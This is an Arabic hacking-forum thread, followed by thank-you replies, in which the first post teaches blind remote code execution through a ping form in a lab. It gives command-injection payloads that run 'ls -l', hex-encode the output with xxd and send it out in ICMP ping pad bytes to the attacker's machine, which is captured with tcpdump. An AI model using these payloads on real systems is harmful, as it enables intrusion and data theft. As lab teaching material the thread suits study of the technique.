1. Dr.Azoz

    Dr.Azoz Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    |K|S|A|
    [​IMG]

    السلام عليكم ورحمة وبركاته

    اللهم صل وسلم على سيدنا محمد وعلى آله وصحبة اجمعين

    اللهم لا علم لنا الا ماعلمتنا انك انت العليم الحكيم
    [​IMG]
    اليوم راح اتكلم عن

    [BGBLUE]Blind Remote Code Execution[/BGBLUE]

    النوع هذا من الثغرات شبيه بثغرات Remote Code Execution والاختلاف الوحيد بان الناتج لا يعرض على الصفحة

    ولو فرضنا عندنا موقع بالشكل التالي

    [​IMG]


    الموقع يقوم بعمل ping للاي ابي اللي تكتبه وفيه ثغرة RCE ولكن للاسف المخرجات ماهي باينة

    في الحالة هذي لابد لنا من التنصت على المودم وعمل بنق لجهازنا عشان نعرف اذا الثغرة موجودة او لا

    نشوف

    اول مانقوم به هو عملية التنصت

    كود PHP:
    tcpdump -i vboxnet0 -n icmp
    الاداة tcpdump تقوم بالتنصت على البيانات المرسلة والمستقبل على المودم vboxnet0 واستخدمنا n- عشان مايتم تحويل العنواين الى اسماء وبالاخير اخترنا البروتوكول icmp اللي يستخدمه الامر ping

    الان بعد ماشغلنا التنصت وصار جاهز نرجع نسوي بنق للاي بي تبعنا ونشوف النتيجة

    الامر المستخدم هو

    كود PHP:
    addr=127.0.0.1ping -c 4 192.168.56.1
    والنتيجة على tcpdump

    [​IMG]

    طبعا الخيار c- في الامر ping يحدد لنا عدد مرات البنق وهنا اخترنا 4 مرات

    الان تاكدنا من ان الموقع مصاب بثغرة Blind Remote Code Execution

    طيب الان ناخذ الاستغلال للخطوة الثانية

    الان بما ان الموقع مانقدر نسوي منه شي الا عن طريق البروتوكول icmp لابد لنا من استخدام


    الامر ping لانه هو الوحيد اللي يستخدم البروتوكول هذا

    الان هدفنا هو تمرير الامر خلال البروتوكول icmp للامر ping

    الان لو نقرا المانويل تبع البينق man ping راح نجي للخيار p- اللي ينص على التالي

    [PHP CODE] -p pattern
    You may specify up to 16 ’’pad’’ bytes to fill out the packet you send. This is useful for
    diagnosing data-dependent problems in a network. For example, -p ff will cause the sent packet to be
    filled with all ones.[/PHP CODE]

    عني بالامكان تغذية البينق بالخيار هذا بالبايتات اللي نبيها والشرط انها تكون 16 بايت كحد اقصى

    يعني لو قدرنا نحول مخرجات الامر اللي نبيه الى هيكس وبعدها نغذيها للامر ping نقدر نستخلص الناتج

    فيه اداة في لينكس اسمها xxd تقوم بالتحويل من الهكس والعكس

    نشوف ناتج الامر النهائي

    [PHP CODE] addr=127.0.0.1; hex=$(ls -l | xxd -ps -c 16); for word in $hex; do ping 192.168.127.101 -c 1 -s 32 -p
    $word; done[/PHP CODE]

    الان الامر اللي نبيه هو ls -l مثل ماهو واضح وحطيته بين قوسين ليكون متغير بعدين خليته يمر على الامر xxd

    واستخدمت الخيارين الاول ps- وهو لتحويله الى هكس خالص بعدين حطيته على 16 وهو العواميد c- عشان مثل ماقلنا الخيار p- في بينق اكثر مايرسل 16 بايت والامر هذا يعطي سطر جديد بعد كل سطر من 16 بايت

    بعدين لوب بسيط باللينكس يخلينا نرسل كل 16 بايت لحالها

    نشوف النتيجة النهائية

    [​IMG]


    استخدمت الامر

    كود PHP:
    tcpdump -i vboxnet0 -n icmp --/tmp/packet.pac
    لاضافة كانت X- عشان نشوف محتوى الباكج و w- عشان نصدر الملف

    الان نفتح الملف ونشوف وش الناتج


    [​IMG]

    وهذي هي النتيجة علما بان الصفحة debug.php هي الصفحة اللي فيها الثغرة

    يعني الطريقة كفيلة باستخراج المعلومات وتطبيق الاوامر
    [​IMG]
    الى هنا ينتهي الدرس

    ان اخطات فمن نفسي والشيطان وان اصبت فمن الله وحده

    لا تنسوني من دعائكم :ُeُiy:
     
  2. V!rus-MarOc

    V!rus-MarOc Developer

    الأنتساب:
    ‏26 ديسمبر 2011
    المشاركات:
    55
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    8
    الوظيفة:
    Hacker
    الإقامة:
    ©MAЯΘ
    رد: ثغرات Blind Remote Code Execution

    يعطيك الف الف عافية
     
  3. R0CKO

    R0CKO Developer

    الأنتساب:
    ‏8 يوليو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ســــ(حـرة)ــوريــة اّبيــــــــــة
    رد: ثغرات Blind Remote Code Execution

    بارك الله فيك على هذا الطرح
     
  4. M3N X

    M3N X Developer

    الأنتساب:
    ‏16 يوليو 2013
    المشاركات:
    97
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    رد: ثغرات Blind Remote Code Execution

    يعطيك العافيـة يامبدع

    مجهود كبير ، تسلم ايدك
     
  5. ĸʜɜʟɛɒ

    ĸʜɜʟɛɒ Active DeveloPer

    الأنتساب:
    ‏3 نوفمبر 2012
    المشاركات:
    102
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    Gaza
    رد: ثغرات Blind Remote Code Execution

    جزاك لله خيرا أخي
    واصل و لاتحرمن من جديدك
     
  6. Injection

    Injection Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    الوظيفة:
    *******
    الإقامة:
    iq-t34m
    رد: ثغرات Blind Remote Code Execution

    وعليكم السلام ورحمه الله وبركاته

    يعطيك الف عافيه يا حبيبي
     
  7. coiffa

    coiffa Developer

    الأنتساب:
    ‏1 يناير 2013
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: ثغرات Blind Remote Code Execution

    مجهود كبير وقمة في الابداع بارك الله فيك
     
  8. لـ حظة غ ـيآبك

    لـ حظة غ ـيآبك Developer

    الأنتساب:
    ‏28 فبراير 2013
    المشاركات:
    75
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: ثغرات Blind Remote Code Execution

    يعطيك العافيه آخي ..

    بـآرك آلله فيك
     
  9. LIATH ALMAHDAWI

    LIATH ALMAHDAWI Developer

    الأنتساب:
    ‏12 فبراير 2015
    المشاركات:
    83
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: ثغرات Blind Remote Code Execution

    سلمت الايادي حبيبي قلبي ^_^
     

مشاركة هذه الصفحة